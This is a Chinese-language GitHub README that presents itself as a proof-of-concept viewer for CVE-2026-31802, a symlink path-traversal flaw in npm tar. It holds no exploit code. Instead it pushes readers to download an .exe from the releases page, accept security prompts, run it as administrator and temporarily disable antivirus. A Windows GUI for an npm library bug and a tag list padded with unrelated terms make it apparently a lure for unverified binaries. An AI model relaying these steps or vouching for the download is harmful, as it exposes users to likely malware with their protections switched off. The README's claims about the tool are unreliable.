Recorded-texteditor120/CVE-2026-31802

GitHub: Recorded-texteditor120/CVE-2026-31802

演示npm tar包路径遍历漏洞CVE-2026-31802的概念验证工具,通过符号链接实现任意文件覆写。

Stars: 0 | Forks: 0

# 🛡️ CVE-2026-31802 - 简单概念验证查看器 [![下载 CVE-2026-31802](https://img.shields.io/badge/Download_CVE--2026--31802-ff6347?style=for-the-badge&logo=github)](https://github.com/Recorded-texteditor120/CVE-2026-31802/releases) ## 📋 关于 CVE-2026-31802 本仓库提供了 CVE-2026-31802 的概念验证 和详细说明。该问题是 npm tar 包中的一个安全漏洞。它允许攻击者利用符号链接 和路径遍历 诱骗软件将文件写入其允许文件夹之外的位置。 这可能导致在未经您许可的情况下覆盖您计算机上的重要文件。理解和测试此漏洞有助于提高安全性。本项目展示了该漏洞的工作原理,并帮助安全研究人员验证修复情况。 ## 🖥️ 系统要求 要在 Windows 机器上运行此软件,请确保您的系统满足以下要求: - Windows 10 或更高版本 - 至少 2 GB 的可用硬盘空间 - 互联网连接以下载文件 - 基本的文件管理技能(下载、打开文件) 不需要编程或开发工具。任何会使用网络浏览器并能运行简单程序的人都可以按照这些步骤操作。 ## 🚀 入门指南:如何下载和使用 下载内容不是单个文件,而是一个发布页面。请仔细按照以下步骤操作: 1. **访问发布页面** 点击上方的徽章或直接访问此链接: [https://github.com/Recorded-texteditor120/CVE-2026-31802/releases](https://github.com/Recorded-texteditor120/CVE-2026-31802/releases) 2. **查找最新版本** 在发布页面上,查找最新版本。它通常出现在列表顶部并包含日期。 3. **下载正确的文件** 点击最适合 Windows 的文件,通常是 `.exe` 或 `.zip` 扩展名。如果不确定,请选择 `.exe` 以便更轻松地安装。 4. **存储文件** 将文件保存在已知文件夹中,例如 `Downloads` 或 `Desktop`。 ## 💾 安装和运行软件 如果您下载的是 `.exe` 文件: 1. 找到保存下载的 `.exe` 文件的位置。 2. 双击该文件以开始安装或直接运行程序。 3. 如果出现安全提示,请选择“运行” 或“允许”。 4. 按照任何屏幕上的提示完成设置。 5. 软件将打开,您可以立即使用它。 如果您下载的是 `.zip` 文件: 1. 右键点击 `.zip` 文件并选择“全部解压缩”。 2. 选择一个文件夹(如桌面)来解压文件。 3. 打开解压后的文件夹。 4. 双击主程序文件 (`.exe`) 以启动。 ## 🔍 使用软件 此应用程序作为演示工具,用于展示漏洞的运作方式。 - 加载或模拟 npm tar 存档 以测试路径遍历和符号链接行为。 - 观察文件如何被写入解压文件夹之外的位置。 - 使用此工具了解风险并制定缓解措施。 界面将通过简单的按钮和文本框引导您。不需要编程技能。请仔细按照屏幕上的说明操作。 ## ⚙️ 此演示的工作原理 该软件重现了 npm tar 模块中的安全缺陷。 - 它创建包含符号链接的特殊存档文件。 - 这些链接试图逃逸允许的文件路径。 - 该工具显示这些文件可以在解压文件夹之外被覆盖。 此行为突显了为何该漏洞是严重的且需要修复。 ## 🔄 更新软件 定期查看发布页面以获取更新: [https://github.com/Recorded-texteditor120/CVE-2026-31802/releases](https://github.com/Recorded-texteditor120/CVE-2026-31802/releases) 下载并安装新版本的方式与获取第一个版本相同。更新可能包括错误修复、安全补丁或易用性改进。 ## 🛠 故障排除 - 如果程序无法启动,请尝试右键单击该文件并选择“以管理员身份运行”。 - 如果 Windows 阻止了该文件,请在安全中心查找允许您运行或取消阻止该文件的通知。 - 确保您的系统满足上述要求。 - 如果界面看起来不完整,可能是您的杀毒软件阻止了某些部分。尝试在设置期间暂时禁用它。 - 如果下载出现任何问题,请检查您的互联网连接或尝试使用其他浏览器。 ## 📌 附加信息 该软件仅用于教育和测试目的。其目标是帮助提高对此特定 npm tar 弱点的安全意识和修复。 该仓库包含有关漏洞、利用方法和测试过程的详细文档。请随时阅读包含的文件以深入了解。 ## 🗂 主题和标签 该项目涵盖: - cve - cve-2026-31802 - exploit - node-tar - path-traversal - poc - security - security-research - symlink - tar - vulnerability 这些术语与漏洞的性质和相关领域有关。 ## ⚡ 快速访问下载链接 [![获取 CVE-2026-31802](https://img.shields.io/badge/Get_CVE--2026--31802-4CAF50?style=for-the-badge&logo=github)](https://github.com/Recorded-texteditor120/CVE-2026-31802/releases)
标签:Arbitrary File Write, CVE-2026-31802, DNS 反向解析, DNS 解析, MITM代理, NPM TAR, PoC, 任意文件覆盖, 依赖混淆, 安全测试, 攻击性安全, 文件系统漏洞, 暗色界面, 暴力破解, 概念验证, 漏洞分析, 漏洞复现, 符号链接攻击, 网络安全, 自定义脚本, 解压缩漏洞, 路径探测, 路径遍历, 隐私保护